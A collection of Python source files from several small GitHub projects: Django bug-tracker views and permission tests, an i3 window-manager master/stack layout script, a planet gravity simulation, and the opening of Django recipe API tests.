f'?next=/bugs/{self.bug.id}/create_message'
)
self.client.force_login(self.non_member)
res = self.client.post(self.message_create_url)
self.assertEqual(res.status_code, 403)
self.client.force_login(self.member)
res = self.client.post(self.message_create_url)
self.assertNotEqual(res.status_code, 403)
self.client.force_login(self.supervisor)
res = self.client.post(self.message_create_url)
self.assertNotEqual(res.status_code, 403)
self.client.force_login(self.superuser)
res = self.client.post(self.message_create_url)
self.assertNotEqual(res.status_code, 403)
def test_message_create_view_successful(self):
"""Test the message create view automatically sets fields correctly"""
payload = {'content': 'Test Message'}
self.client.force_login(self.member)
res = self.client.post(self.message_create_url, payload)
message = Message.objects.filter(content=payload['content'])
self.assertEqual(res.status_code, 302)
self.assertTrue(message.exists())
self.assertEqual(message[0].bug, self.bug)
self.assertEqual(message[0].writer, self.member)
self.assertEqual(message[0].creationDate.date(), datetime.date.today())
def test_message_create_view_invalid_payload(self):
"""Test the message create view correctly handles invalid payloads"""
self.client.force_login(self.member)
res = self.client.post(self.message_create_url)
self.assertEqual(res.status_code, 400)
self.assertFalse(Message.objects.exists())
res = self.client.post(self.message_create_url, {'content': ''})
self.assertEqual(res.status_code, 400)
self.assertFalse(Message.objects.exists())
```
#### File: app/bugs/views.py
```python
from django.urls import reverse_lazy
from django.shortcuts import redirect, get_object_or_404
from django.core.exceptions import SuspiciousOperation
from django.core.exceptions import PermissionDenied
from django.utils import timezone
from django.views.generic import View
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from django.views.generic.edit import CreateView, UpdateView
from django.contrib.auth.mixins import LoginRequiredMixin
from .models import Bug, Message
from .forms import BugCreateForm, BugUpdateForm, BugCreatorUpdateForm
from core.mixins import \
IsInProjectMixin, \
IsSupervisorMixin, \
IsSupervisorOrAssignedMixin, \
IsCreatorMixin
from members.models import Member
class BugListView(LoginRequiredMixin, ListView):
"""View for listing bugs"""
model = Bug
template_name = 'bugs/list.html'
context_object_name = 'bugs'
login_url = reverse_lazy('members:login')
def get_queryset(self):
"""Return the list of projects applting filters and ordering"""
queryset = self.model.objects.all() \
if self.request.GET.get('show_inactive') \
else self.model.get_active().all()
return queryset.order_by('-creationDate')
class BugDetailView(IsInProjectMixin, DetailView):
"""View for display bug detail"""
model = Bug
template_name = 'bugs/detail.html'
context_object_name = 'bug'
def get_context_data(self, **kwargs):
"""Add additional data to the context"""
context = super().get_context_data(**kwargs)
context['isAdminOrSupervisor'] = (
self.request.user.is_superuser or
self.request.user in self.object.project.supervisors.all()
)
context['status_class'] = 'text-' + self.object.STATUS_CLASSES[
self.object.status
]
context['messages'] = self.object.messages.order_by('-creationDate')
return context
class BugCreateView(LoginRequiredMixin, CreateView):
"""View for creating bugs"""
model = Bug
form_class = BugCreateForm
template_name = 'bugs/create.html'
login_url = reverse_lazy('members:login')
def get_success_url(self):
"""Return the url to the current object detail page"""
return reverse_lazy('bugs:detail', args=[self.object.id])
def form_valid(self, form):
"""If the form is valid, add the creator and save the object"""
if not self.request.user.is_authenticated:
print("Bug creation of unauthenticated user denied!")
return redirect(self.login_url)
self.object = form.save(commit=False)
if not self.request.user.is_superuser and \
self.request.user not in self.object.project.members.all():
raise PermissionDenied(
"A member cannot create a bug on a project it is not part of!"
)
self.object.creator = self.request.user
self.object.save()
form.save_m2m()
return redirect(self.get_success_url())
def get_initial(self):
"""Set the active project if supplied in GET param"""
project = self.request.GET.get('project')
if project:
return {'project': int(project)}
return {}
class BugUpdateView(IsSupervisorMixin, UpdateView):
"""View for updating bugs"""
model = Bug
form_class = BugUpdateForm
template_name = 'bugs/update.html'
login_url = reverse_lazy('members:login')
def get_success_url(self):
"""Return the url to the current object detail page"""
return reverse_lazy('bugs:detail', args=[self.object.id])
def get_form(self, form_class=None):
"""Return a form with the correct queryset"""
if form_class is None:
form_class = self.get_form_class()
if self.object and self.object.project:
project_members = self.object.project.members.all()
return form_class(project_members, **self.get_form_kwargs())
return form_class(None, **self.get_form_kwargs())
class BugCreatorUpdateView(IsCreatorMixin, UpdateView):
"""View for updating bugs"""
model = Bug
form_class = BugCreatorUpdateForm
template_name = 'bugs/creator_update.html'
login_url = reverse_lazy('members:login')
def get_success_url(self):
"""Return the url to the current object detail page"""
return reverse_lazy('bugs:detail', args=[self.object.id])
class BugAssignMemberView(IsSupervisorMixin, View):
"""Perform assignment of member to bug"""
model = Bug
def post(self, request, pk):
bug = get_object_or_404(Bug, pk=pk)
member_ids = request.POST.getlist('member_ids')
if not member_ids:
raise SuspiciousOperation('Member id not sent!')
member_ids = [int(m_id) for m_id in member_ids]
try:
for member_id in member_ids:
member = Member.objects.get(id=member_id)
if member not in bug.project.members.all():
raise SuspiciousOperation(
'Member must be part of bug project!'
)
bug.assigned_members.add(member)
except Member.DoesNotExist:
raise SuspiciousOperation('Invalid member id!')
return redirect('bugs:detail', pk=pk)
class BugChangeStatusView(IsSupervisorMixin, View):
"""Change the status of the bug"""
model = Bug
def post(self, request, pk):
bug = get_object_or_404(Bug, pk=pk)
status = request.POST.get('status')
if not status:
raise SuspiciousOperation('New status must be sent in POST')
try:
bug.set_status(status)
except ValueError:
raise SuspiciousOperation('Invalid status')
else:
if status not in bug.ACTIVE_STATUS:
bug.closingDate = timezone.now()
bug.save()
return redirect('bugs:detail', pk=pk)
class BugChangeWorkingStatusView(IsSupervisorOrAssignedMixin, View):
"""Change the status of the bug"""
model = Bug
def post(self, request, pk):
bug = get_object_or_404(Bug, pk=pk)
starting = request.POST.get('starting')
if starting is None:
raise SuspiciousOperation(
'Value of starting must be sent in POST'
)
try:
bug.set_status(
bug.WORKING_STATUS if int(starting) else bug.WAITING_STATUS
)
bug.save()
except ValueError:
raise SuspiciousOperation('Invalid status')
return redirect('bugs:detail', pk=pk)
class MessageCreateView(IsInProjectMixin, View):
"""Creates a new message for the bug board"""
model = Bug
def post(self, request, pk):
bug = get_object_or_404(Bug, pk=pk)
content = request.POST.get('content', None)
if not content:
raise SuspiciousOperation('Invalid message text!')
content = str(content)
Message.objects.create(
content=content,
writer=request.user,
bug=bug
)
return redirect('bugs:detail', pk=pk)
```
#### File: projects/tests/test_models.py
```python
from django.test import TestCase
from mixer.backend.django import mixer
from projects.models import Project
from bugs.models import Bug
class ProjectModelTests(TestCase):
"""Test the project model"""
def setUp(self):
self.project = Project.objects.create(title='Test')
def test_project_status_enums(self):
"""Test the status enums are set up correctly"""
for active_status in Project.ACTIVE_STATUS:
self.assertIn(active_status, Project.POSSIBLE_STATUS)
for status in Project.POSSIBLE_STATUS:
self.assertIn(status, Project.STATUS_CLASSES.keys())
def test_project_set_status(self):
"""Test the set_status project method"""
self.project.set_status('ON-GOING')
self.assertEqual(self.project.status, 'ON-GOING')
with self.assertRaises(ValueError):
self.project.set_status('NON_EXISTING_ENUM')
def test_project_status_tuples(self):
"""Test the status_tuples property"""
for st in self.project.status_tuples:
self.assertEqual(Project.STATUS_CLASSES[st[0]], st[1])
def test_project_get_active(self):
"""Test the get_active class method"""
Project.objects.create(title='Test2', _status='PAUSED')
Project.objects.create(title='Test3', _status='CLOSED')
Project.objects.create(title='Test4', _status='FINISHED')
actives = Project.get_active()
self.assertQuerysetEqual(set(actives), {str(self.project)})
def test_project_active_bugs(self):
"""Test the active_bugs project method"""
project = mixer.blend(Project)
b1 = mixer.blend(Bug, project=project, _status='WAITING')
b2 = mixer.blend(Bug, project=project, _status='BEING WORKED')
b3 = mixer.blend(Bug, project=project, _status='FIXED')
b4 = mixer.blend(Bug, project=project, _status='CLOSED')
active_bugs = project.active_bugs
self.assertIn(b1, active_bugs)
self.assertIn(b2, active_bugs)
self.assertNotIn(b3, active_bugs)
self.assertNotIn(b4, active_bugs)
p2 = Project.objects.create(title="Proj")
self.assertFalse(p2.active_bugs.exists())
``` |
{
"source": "JoaoAPS/i3-master-stack",
"score": 2
} |
#### File: JoaoAPS/i3-master-stack/i3_master_layout.py
```python
import argparse
import configparser
import os
import shutil
import subprocess
from pprint import pprint
from time import sleep
import i3ipc
import i3_swallow
rootMark = "root"
masterMark = "master"
slaveMark = "slave"
class I3MasterConfig(object):
def __init__(self):
self.terminal = 'Alacritty'
self.screenWidth = 1300
self.screenHeight = 800
self.posX = 310
self.posY = 160
self.firstScreenPercent = 14 # different size between master and slave (unit : ppt)
self.limitWindowOnMaster = 2
self.isEnableSwallow = True
self.isSwapMasterOnNewInstance = True # new instance on master is change to master
pass
def dumpNode(node):
result = {}
result["type"] = node["type"]
result["window"] = node["window"]
result["layout"] = node["layout"]
result["percent"] = node["percent"]
result["nodes"] = []
if(node.get('marks') != None):
result['marks'] = node['marks']
if node.get("window_properties") != None:
result["title"] = node["window_properties"]["instance"] + \
" - " + node["window_properties"]["title"]
if len(node["nodes"]) > 0:
result["nodes"] = []
for node in node["nodes"]:
result["nodes"].append(dumpNode(node))
if(len(node["floating_nodes"]) > 0):
result["floating_nodes"] = []
for node in node["floating_nodes"]:
result["floating_nodes"].append(dumpNode(node))
return result
def dumpWorkSpace(workspace: i3ipc.Con):
result = {}
result["types"] = workspace["type"]
result["workspace_layout"] = workspace["workspace_layout"]
if len(workspace["nodes"]) >= 0:
result["nodes"] = []
for node in workspace["nodes"]:
result["nodes"].append(dumpNode(node))
pass
if len(workspace["floating_nodes"]) >= 0:
result["floating_nodes"] = []
for node in workspace["floating_nodes"]:
result["floating_nodes"].append(dumpNode(node))
pass
pass
pprint(workspace)
pprint(result)
class WorkspaceData(object):
def __init__(self, num: int):
self.num = num
self.swapNodeId = 0
self.masterWidth = 0
self.firstWindowId = 0
self.callback = None
self.isSwallowNext = False
self.isDisable = False
self.slaveMark = slaveMark+"_"+str(num)
self.masterMark = masterMark+"_"+str(num)
self.rootMark = rootMark+"_"+str(num)
pass
class I3MasterLayout(object):
def __init__(self, i3: i3ipc.Con, config: I3MasterConfig, debug=False):
self.i3 = i3
self.masterWidth = 0
self.config=config
self.debug = debug
self.callbacks = {}
self.workSpaceDatas = {}
self.isSwapMasterOnNewInstance = self.config.isSwapMasterOnNewInstance
self.isSwallowNext = False
pass
def unMarkMasterNode(self, node):
for mark in node.marks:
if mark == masterMark:
self.i3.command('[con_id=%s] unmark' % (node.id))
return True
for node in node.nodes:
if(self.unMarkMasterNode(node)):
return True
return False
def getWorkSpaceData(self, workspaceNum) -> WorkspaceData:
ws = self.workSpaceDatas.get(workspaceNum)
if ws == None:
ws = WorkspaceData(workspaceNum)
self.workSpaceDatas[workspaceNum] = ws
return ws
def getWorkSpaceMark(self, markName, workspaceName):
return markName+"_"+str(workspaceName)
def findNextNodeToMaser(self, node):
if(node.window != None):
return node
for node in node.nodes:
if(node.window != None):
return node
else:
result = self.findNextNodeToMaser(node)
if result != None:
return result
return None
def getAllChildWindow(self, root):
result = []
for node in root.nodes:
if(node.window != None):
result.append(node)
else:
result = result + self.getAllChildWindow(node)
return result
def findChildNodeByMarked(self, node, mark) -> i3ipc.Con:
for child in node.nodes:
if(mark in child.marks):
return child
else:
result = self.findChildNodeByMarked(child, mark)
if result != None:
return result
return None
def findChildNodeById(self, node, conId) -> i3ipc.Con:
for child in node:
if child.id == conId :
return child
elif child.nodes != None:
result = self.findChildNodeById(child.nodes, conId)
if result != None:
return result
return None
def validateMasterAndSlaveNode(self, workspace):
root = workspace
if(root.layout == 'splitv'):
self.i3.command('[con_id=%s] layout splith' % root.id)
masterNode = None
slaveNode = None
workspaceData = self.getWorkSpaceData(workspace.num)
masterNode = self.findChildNodeByMarked(root, workspaceData.masterMark)
if(masterNode != None and len(root.nodes) == 1):
# check length root.nodes ==1 because i3 will merge the master node to another node
# then we need to find a better master node from root nodes
root = masterNode.parent
elif (len(root.nodes) > 0):
masterNode = root.nodes[0]
if(len(root.nodes) > 1):
# check if have slave node in current root
for node in root.nodes:
if workspaceData.slaveMark in node.marks:
slaveNode = node
# if don't have set the second node is slave
if(slaveNode == None):
slaveNode = root.nodes[1]
if(slaveNode == None and masterNode != None):
# try to find the best solutionn for master and slave node
# special case i3 will stack slave node into master node in too many connection
allChild = self.getAllChildWindow(masterNode)
if(len(allChild) >= 2):
if(masterNode.id != allChild[0].id):
self.i3.command('[con_id=%s] unmark %s' %
(masterNode.id, workspaceData.masterMark))
root = masterNode.parent
masterNode = allChild[0]
self.i3.command('[con_id=%s] mark %s' %
(masterNode.id, workspaceData.masterMark))
self.i3.command('[con_id=%s] mark %s' %
(root.id, workspaceData.rootMark))
if(len(root.nodes) > 1):
slaveNode = root.nodes[1]
else:
# we can't find the best slave node
pass
# check master node
if(masterNode != None):
if(root.layout == 'splitv'):
# if i3 put the master node to child another node we need to move it to parent node
i3.command('[con_id=%s] move left' % masterNode.id)
if not workspaceData.masterMark in masterNode.marks:
self.i3.command('[con_id=%s] mark %s' %
(masterNode.id, workspaceData.masterMark))
if not workspaceData.masterMark in root.marks:
self.i3.command('[con_id=%s] mark %s' %
(root.id, workspaceData.rootMark))
# check child of masterNode when master is not widow
if(masterNode.window == None):
allChild = self.getAllChildWindow(masterNode)
if(
len(allChild) > self.config.limitWindowOnMaster and
slaveNode != None
):
# remove all child node on master if have too many
for node in allChild[self.config.limitWindowOnMaster:]:
if(node.window != None):
self.i3.command('[con_id=%s] move window to mark %s' % (
node.id, workspaceData.slaveMark))
self.i3.command('[con_id=%s] focus' % (node.id))
pass
if(slaveNode != None and masterNode != None):
# mark slave
if not workspaceData.slaveMark in slaveNode.marks:
self.i3.command('[con_id=%s] mark %s' %
(slaveNode.id, workspaceData.slaveMark))
# if(slaveNode.layout=='splitv'):
# i3.command('[con_id=%s] layout splith' % slaveNode.id)
# cleate layout for slave
if(slaveNode.window != None):
self.i3.command('[con_id=%s] split vertical' % slaveNode.id)
if(len(root.nodes) > 2):
for node in root.nodes:
# move all child node from root to slave
if node.id != masterNode.id and node.id != slaveNode.id:
self.i3.command('[con_id=%s] move %s to mark %s'
% (node.id,
"container" if node.window == None else "window",
workspaceData.slaveMark))
if(node.window != None):
self.i3.command('[con_id=%s] focus' % (node.id))
self.getMasterSize()
pass
def on_new(self, event):
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
if workspaceData.isDisable:
return
window = self.i3.get_tree().find_focused()
# print("NEW ===============")
# pprint(vars(workspaceData))
# print(window.parent.ipc_data)
# dumpWorkSpace(workspace.ipc_data)
if (
len(workspace.nodes) == 1 and
len(workspace.nodes[0].nodes) == 0 and
window.name == self.config.terminal and
len(workspace.floating_nodes) == 0
):
workspaceData.masterWidth = 0
workspaceData.firstWindowId = window.id
event.container.command('floating enable')
event.container.command(
"exec xdotool windowsize %d %s %s;exec xdotool windowmove %d %s %s"
% (window.window, self.config.screenWidth, self.config.screenHeight, window.window, self.config.posX, self.config.posY))
if (
workspaceData.firstWindowId != 0 and
window.floating == "auto_off" and
len(workspace.floating_nodes) >= 1 and
len(workspace.floating_nodes[0].nodes) >= 1 and
len(workspace.nodes) == 1 and
len(workspace.nodes[0].nodes) == 0
):
# if seconde node open it change first node to tiling mode
firstNode = self.findChildNodeById(
workspace.floating_nodes, workspaceData.firstWindowId)
if(
firstNode != None and
firstNode.id != window.id and
## only auto change on terminal instance
firstNode.ipc_data["window_properties"]["instance"] == self.config.terminal
):
firstWindowId = firstNode.id
self.i3.command('[con_id=%s] floating disable' % firstWindowId)
self.i3.command('[con_id=%s] move left' % firstWindowId)
self.i3.command('[con_id=%s] mark %s' % (
firstWindowId, self.getWorkSpaceMark(masterMark, workspace.num)))
if (self.config.firstScreenPercent > 0):
self.i3.command('[con_id=%s] resize grow width %s px or %s ppt '
% (firstWindowId, self.config.firstScreenPercent, self.config.firstScreenPercent))
event.container.command('split vertical')
workspaceData.firstWindowId = 0
pass
if(self.isSwapMasterOnNewInstance):
self.i3.command('[con_id=%s] mark %s' %
(window.parent.id, workspaceData.rootMark))
self.swapMaster(event)
pass
# second node is automatic split vertical
elif (
len(window.parent.nodes) == 2 and
window.parent.layout == 'splith' and
workspaceData.rootMark not in window.parent.marks
):
event.container.command('split vertical')
pass
# swap master and push master to top of stack of slave nodes
if self.isSwapMasterOnNewInstance:
isRootParent= workspaceData.rootMark in window.parent.marks
masterNode = self.findChildNodeByMarked(
workspace, workspaceData.masterMark)
if self.isSwallowNext:
self.isSwallowNext = False
if(masterNode!=None):
print("resizeMaster")
self.resizeMaster(masterNode.id)
isRootParent = False
pass
if(isRootParent):
slaveNode = self.findChildNodeByMarked(
workspace, workspaceData.slaveMark)
if(masterNode != None and masterNode.id != window.id):
if(slaveNode != None and len(slaveNode.nodes)>0):
# push to slave stack
firstNode = slaveNode.nodes[0]
self.i3.command('[con_id=%s] focus' %
(firstNode.id))
self.i3.command('[con_id=%s] move window to mark %s' % (
masterNode.id, workspaceData.slaveMark))
self.i3.command('[con_id=%s] swap container with con_id %d'
% (masterNode.id, firstNode.id))
pass
else:
# no slave stack
self.i3.command('[con_id=%s] mark %s' %
(masterNode.id, workspaceData.slaveMark))
if len(window.parent.nodes)>0:
self.i3.command('[con_id=%s] swap container with con_id %d'
% (masterNode.id, window.id))
self.i3.command('[con_id=%s] move left'% ( window.id))
self.i3.command('[con_id=%s] unmark %s' %
(masterNode.id, workspaceData.masterMark))
self.i3.command('[con_id=%s] mark %s' %
(window.id, workspaceData.masterMark))
if(workspaceData.masterWidth != 0):
self.i3.command('[con_id=%s] resize set %s 0'
% (window.id, workspaceData.masterWidth))
self.i3.command('[con_id=%s] focus' % (masterNode.id))
self.i3.command('[con_id=%s] focus' % (window.id))
workspaceData.swapNodeId = masterNode.id
pass
return
pass
self.validateMasterAndSlaveNode(workspace)
pass
def gotoMaster(self, event):
window = self.i3.get_tree().find_focused()
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
masterNode = self.findChildNodeByMarked(
workspace, workspaceData.masterMark)
if(masterNode != None):
lastSwapNodeId = workspaceData.swapNodeId
if(lastSwapNodeId != 0):
isInMaster = masterNode.window != None and (
workspaceData.masterMark in window.marks)
if(isInMaster == False):
childs = self.getAllChildWindow(masterNode)
for node in childs:
if(window.id == node.id):
isInMaster = True
break
pass
if(isInMaster):
self.i3.command('[con_id=%s] focus' %
(lastSwapNodeId))
workspace.swapNodeId = 0
return
pass
if(masterNode.window != None):
self.i3.command('[con_id=%s] focus' % (masterNode.id))
workspaceData.swapNodeId = window.id
pass
if(len(masterNode.nodes) > 0 and masterNode.nodes[0].window != None):
self.i3.command('[con_id=%s] focus' % (masterNode.nodes[0].id))
workspaceData.swapNodeId = window.id
pass
pass
def swap2Node(self, node1Id: int, node2Id: int, workspaceData: WorkspaceData):
self.i3.command('[con_id=%s] swap container with con_id %s' %
(node1Id, node2Id))
self.i3.command('[con_id=%s] unmark %s' %
(node1Id, workspaceData.masterMark))
self.i3.command('[con_id=%s] mark --add %s' %
(node2Id, workspaceData.masterMark))
self.i3.command('[con_id=%s] focus' % (node2Id))
workspaceData.swapNodeId = node1Id
self.emmit('master_change', node2Id)
def swapMaster(self, event):
window = self.i3.get_tree().find_focused()
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
masterNode = self.findChildNodeByMarked(
workspace, workspaceData.masterMark)
if(masterNode != None):
lastSwapNodeId = workspaceData.swapNodeId
if(self.config.limitWindowOnMaster == 1 or len(masterNode.nodes) == 0):
if(lastSwapNodeId != 0 and workspaceData.masterMark in window.marks):
self.swap2Node(
masterNode.id, lastSwapNodeId, workspaceData)
pass
else:
self.swap2Node(masterNode.id, window.id,
workspaceData)
else:
# multi child in master
childs = self.getAllChildWindow(masterNode)
isInMaster = False
for node in childs:
if(window.id == node.id):
isInMaster = True
break
if(isInMaster):
if(lastSwapNodeId != 0):
self.swap2Node(
window.id, lastSwapNodeId, workspaceData)
# workspaceData.swapNodeId = 0
else:
for node in childs:
if(node.id != window.id):
self.swap2Node(
window.id, node.id, workspaceData)
break
else:
if(len(childs) > 0 and childs[0].window != None):
masterNode = childs[0]
pass
self.swap2Node(masterNode.id, window.id, workspaceData)
pass
def getMasterSize(self):
window = self.i3.get_tree().find_focused()
workspace = window.workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
if (
workspaceData.masterMark in window.marks and
workspaceData.rootMark in window.parent.marks and
len(window.parent.nodes) == 2
):
workspaceData.masterWidth = int(window.rect.width)
pass
def resizeMaster(self, condId: int):
window = self.i3.get_tree().find_focused()
workspace = window.workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
if(workspaceData.masterWidth>0):
self.i3.command('[con_id=%s] resize set %s 0'
% (condId, workspaceData.masterWidth))
pass
# region Event Handler
def on(self, event_name, callback):
if self.callbacks is None:
self.callbacks = {}
if event_name not in self.callbacks:
self.callbacks[event_name] = [callback]
else:
self.callbacks[event_name].append(callback)
def emmit(self, event_name, data=None):
if self.callbacks is not None and event_name in self.callbacks:
for callback in self.callbacks[event_name]:
callback(data)
# endregion
def on_close(self, event):
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData = self.getWorkSpaceData(workspace.num)
if(workspaceData.isDisable):
return
allChild=workspace.leaves()
isCloseMaster = False
if(workspaceData.masterMark in event.container.marks):
isCloseMaster = True
self.validateMasterAndSlaveNode(workspace)
if(isCloseMaster):
focusWindow = self.i3.get_tree().find_focused()
if(focusWindow != None and focusWindow.window != None):
self.i3.command('[con_id=%s] move left' % (focusWindow.id))
self.i3.command('[con_id=%s] mark %s' %
(focusWindow.id, workspaceData.masterMark))
if(workspaceData.masterWidth != 0):
self.i3.command('[con_id=%s] resize set %s 0'
% (focusWindow.id, workspaceData.masterWidth))
else:
print("focus window null")
if(len(allChild)==1):
self.i3.command('[con_id=%s] mark %s' % (allChild[0].id,workspaceData.masterMark))
self.i3.command('[con_id=%s] mark %s' % (allChild[0].parent.id,workspaceData.rootMark))
pass
def on_move(self, event):
pass
def on_binding(self, event):
workspace = self.i3.get_tree().find_focused().workspace()
workspaceData= self.getWorkSpaceData(workspace.num)
command = event.ipc_data["binding"]["command"].strip()
if(command == "nop swap master"):
self.swapMaster(event)
elif(command == "nop master toggle"):
workspaceData.isDisable = not workspaceData.isDisable
elif(command == "nop go master"):
self.gotoMaster(event)
elif("resize" in event.ipc_data["binding"]["command"]):
self.getMasterSize()
elif(self.debug):
if event.ipc_data["binding"]["command"] == "nop debug":
workspace = i3.get_tree().find_focused().workspace()
dumpWorkSpace(workspace.ipc_data)
if(workspaceData.isDisable):
return
self.validateMasterAndSlaveNode(workspace)
pass
pass
def on_tick(self, event):
self
def on_focus(self, event):
self
# End class
i3 = i3ipc.Connection()
listHandler = []
masterConfig= I3MasterConfig()
def on_close(self, event):
for handler in (listHandler):
handler.on_close(event)
pass
def on_floating (self,event):
for handler in (listHandler):
handler.on_close(event)
pass
def on_new(self, event):
for handler in listHandler:
handler.on_new(event)
pass
def on_move(self, event):
for handler in listHandler:
handler.on_move(event)
pass
def on_focus(self, event):
for handler in listHandler:
handler.on_focus(event)
pass
def on_binding(self, event):
for handler in listHandler:
handler.on_binding(event)
pass
def on_tick(self, event):
for handler in listHandler:
handler.on_tick(event)
def main():
global listHandler
global masterConfig
parser = argparse.ArgumentParser()
parser.add_argument(
'--debug',
action='store_true',
help='Print debug messages to stderr'
)
args = parser.parse_args()
masterHander = I3MasterLayout(i3, masterConfig, args.debug)
swallowHander = i3_swallow.I3Swallow(
i3, masterConfig.isEnableSwallow, masterMark, masterHander)
if(masterConfig.isEnableSwallow):
listHandler.append(swallowHander)
listHandler.append(masterHander)
# Subscribe to events
i3.on("window::new", on_new)
i3.on("window::focus", on_focus)
i3.on("window::close", on_close)
i3.on("window::move", on_move)
i3.on("binding", on_binding)
i3.on("tick", on_tick)
i3.main()
def readConfig():
config_path = '%s/.config/i3/i3_master.ini' % os.environ['HOME']
dir = os.path.dirname(os.path.realpath(__file__))
if not os.path.isfile(config_path):
print("No config file in.")
# copy file
shutil.copy(dir+"/i3_master.ini", config_path)
pass
config = configparser.ConfigParser()
config.read(config_path)
global masterConfig
configData = config['config']
if(configData!=None):
masterConfig.terminal = configData.get(
'terminal', fallback=masterConfig.terminal)
masterConfig.posX = configData.getint(
'posX', fallback=masterConfig.posX)
masterConfig.posY = configData.getint(
'posY', fallback=masterConfig.posY)
masterConfig.screenWidth = configData.getint(
'screenWidth', fallback=masterConfig.screenWidth)
masterConfig.screenHeight = configData.getint(
'screenHeight', fallback=masterConfig.screenHeight)
masterConfig.isEnableSwallow = configData.getboolean(
'swallow', fallback=masterConfig.isEnableSwallow)
masterConfig.isSwapMasterOnNewInstance = configData.getboolean(
'slaveStack', fallback=masterConfig.isEnableSwallow)
masterConfig.firstScreenPercent = configData.getint(
'masterSizePlus', fallback=14)
masterConfig.limitWindowOnMaster = configData.get(
'limitWindowOnMaster', fallback=masterConfig.limitWindowOnMaster)
pass
if __name__ == "__main__":
readConfig()
main()
``` |
{
"source": "JoaoAPS/PlanetSimulation",
"score": 3
} |
#### File: JoaoAPS/PlanetSimulation/main.py
```python
from src.App import App
from src.Planet import Planet
from src.vecN import Vec3
def main():
# 8 loop
# pos = 10 * Vec3(-0.97000436, 0.24308753)
# vel2 = 10 * Vec3(-0.93240737, -0.86473146)
# vel13 = 10 * Vec3(0.4662036850, 0.4323657300)
# planets = [
# Planet(1000, pos, vel13, (200, 20, 20)),
# Planet(1000, Vec3(), vel2, (20, 200, 20)),
# Planet(1000, -pos, vel13, (20, 20, 200))
# ]
planets = [
Planet(1000, Vec3(50), Vec3(-10, 5), (200, 20, 20)),
Planet(1000, Vec3(5, -15), Vec3(7, 0), (20, 200, 20)),
Planet(1000, Vec3(0, 30), Vec3(1, -5), (20, 20, 200)),
]
planets = [
Planet(5000, Vec3(20), Vec3(-5, -5), (200, 20, 20)),
Planet(5000, Vec3(-20), Vec3(5, 5), (20, 200, 20)),
]
app = App()
app.universe.setPlanets(planets)
app.run()
if __name__ == '__main__':
main()
```
#### File: PlanetSimulation/src/Planet.py
```python
from .vecN import Vec3
from .utils import assertType
class Planet:
"""Represents a planet"""
def __init__(self, mass, pos, vel, color=(0, 0, 0), radius=2):
assertType('mass', mass, [float, int])
assertType('position', pos, Vec3)
assertType('velocity', vel, Vec3)
self.mass = float(mass)
self.pos = pos
self.vel = vel
self.trajectory = []
self.color = color
self.radius = radius
def __str__(self):
return f'Planet at ({self.pos.x}, {self.pos.y}, {self.pos.z})'
__repr__ = __str__
def update(self, field, dt):
"""Update properties one time step following gravitational field"""
self.trajectory.append(self.pos)
self.pos += self.vel * dt
self.vel += field * dt
```
#### File: PlanetSimulation/src/utils.py
```python
def assertType(varName, var, correct_type):
"""Raises a TypeError if 'var' is not of type 'correct_type'"""
correct = False
if type(correct_type) is list or type(correct_type) is tuple:
for t in correct_type:
if type(var) is t:
correct = True
else:
correct = type(var) is correct_type
if not correct:
raise TypeError(
varName + ' must be of type ' + str(correct_type) +
', type' + str(type(var)) + ' was passed!'
)
``` |
{
"source": "JoaoAPS/Recipes-API",
"score": 2
} |
#### File: recipe/tests/test_recipe_api.py
```python
import tempfile
import os
from PIL import Image
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
from rest_framework.test import APIClient
from rest_framework import status
from recipe.models import Recipe, Tag, Ingredient
from recipe.serializers import RecipeSerializer, RecipeDetailSerializer
RECIPE_LIST_URL = reverse('recipe:recipe-list')
# Helper functions
def recipe_detail_url(id):
return reverse('recipe:recipe-detail', args=[id])
def image_upload_url(id):
return reverse('recipe:recipe-upload-image', args=[id])
def sample_user(email='<EMAIL>', password='<PASSWORD>', name='Sample'):
return get_user_model().objects.create_user(
email=email, password=password, name=name
)
def sample_recipe(user, **params):
defaults = {
'title': 'Test Recipe',
'time_minutes': 5,
'price': 50.0
}
defaults.update(params)
return Recipe.objects.create(user=user, **defaults)
def sample_ingredient(user, name='Test Ing'):
return Ingredient.objects.create(user=user, name=name)
def sample_tag(user, name='Test Tag'):
return Tag.objects.create(user=user, name=name)
def sample_recipe_payload(**params):
defaults = {
'title': 'Test Recipe',
'time_minutes': 5,
'price': 50.0
}
defaults.update(params)
return defaults
class PublicRecipeApiTests(TestCase):
"""Tests for public requests on Recipe API"""
def setUp(self):
self.client = APIClient()
def test_unauthorized_retrieve_invalid(self):
"""Test that recipes cannot be retrieved by an unauthorized user"""
res = self.client.get(RECIPE_LIST_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateRecipeApiTests(TestCase):
"""Tests for private requests on Recipe API"""
def setUp(self):
self.user = get_user_model().objects.create_user(
email='<EMAIL>',
password='<PASSWORD>',
name='<NAME>'
)
self.client = APIClient()
self.client.force_authenticate(self.user)
def test_retrieve_list_successful(self):
"""Test that an authenticated user can retrieve the recipes"""
sample_recipe(self.user)
recipe = sample_recipe(
self.user,
title='Test Recipe 2',
time_minutes=10,
price=15.00
)
recipe.ingredients.add(sample_ingredient(self.user))
recipe.tags.add(sample_tag(self.user))
serializer = RecipeSerializer(
Recipe.objects.all().order_by('title'),
many=True
)
res = self.client.get(RECIPE_LIST_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, serializer.data)
def test_recipes_limited_to_authenticated_user(self):
"""Test that the authenticated user get their recipes only"""
recipe = sample_recipe(self.user)
sample_recipe(
user=sample_user(),
title='Other Recipe',
time_minutes=7,
price=10.1
)
serializer = RecipeSerializer(recipe)
res = self.client.get(RECIPE_LIST_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(len(res.data), 1)
self.assertEqual(res.data[0], serializer.data)
def test_retrieve_recipe_detail(self):
"""Test retrieving the recipe details"""
recipe = sample_recipe(self.user)
recipe.ingredients.add(sample_ingredient(self.user))
recipe.tags.add(sample_tag(self.user))
serializer = RecipeDetailSerializer(recipe)
res = self.client.get(recipe_detail_url(recipe.id))
